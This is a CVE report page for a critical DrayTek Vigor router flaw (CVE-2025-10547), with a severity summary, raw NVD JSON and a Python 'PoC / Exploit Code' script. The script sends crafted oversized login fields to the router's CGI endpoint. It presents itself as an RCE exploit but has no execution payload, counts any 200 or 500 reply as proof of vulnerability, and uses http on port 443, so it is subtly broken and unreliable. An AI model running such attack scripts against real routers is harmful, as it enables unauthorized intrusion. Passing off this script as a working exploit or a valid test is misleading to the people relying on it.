Security Vulnerability Report
CVE-2025-10547 CVSS 9.8 CRITICAL

Published: 2025-10-03 12:15:43
Last Modified: 2026-04-15 00:35:42

Description

An uninitialized variable in the HTTP CGI request arguments processing component of Vigor Routers running DrayOS may allow an attacker the ability to perform RCE on the appliance through memory corruption.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DrayTek Vigor routers running DrayOS firmware (for the specific affected versions, refer to DrayTek's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10547 - DrayTek Vigor Router DrayOS Uninitialized Variable RCE PoC
# Vulnerability: Uninitialized variable in HTTP CGI request arguments processing
# Impact: Remote Code Execution via memory corruption
# CVSS: 9.8 (CRITICAL)
import requests
import sys
import urllib.parse

TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
PORT = 443
CGI_PATH = "/cgi-bin/mainfunction.cgi"


def exploit(target):
    """
    Exploit CVE-2025-10547 by sending crafted HTTP CGI request
    with parameters designed to trigger the uninitialized variable bug.
    """
    url = f"http://{target}:{PORT}{CGI_PATH}"

    # Crafted payload targeting uninitialized variable in CGI argument processing
    # The payload contains specially crafted parameters to trigger memory corruption
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "*/*"
    }

    # Malformed CGI parameters designed to exploit uninitialized variable
    payload = {
        "action": "login",
        "username": "A" * 4096,
        "password": "\x00" * 256 + "AAAA",
        "sessKey": "\xff" * 128
    }

    try:
        # Send the malicious request
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        print(f"[*] Target: {target}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.content)}")
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Target appears vulnerable to CVE-2025-10547")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-10547 - DrayTek Vigor Router RCE PoC")
    print("Uninitialized Variable in HTTP CGI Processing")
    print("=" * 60)
    exploit(TARGET)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10547", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:42.993", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An uninitialized variable in the HTTP CGI request arguments processing component of Vigor Routers running DrayOS may allow an attacker the ability to perform RCE on the appliance through memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities/", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/294418", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}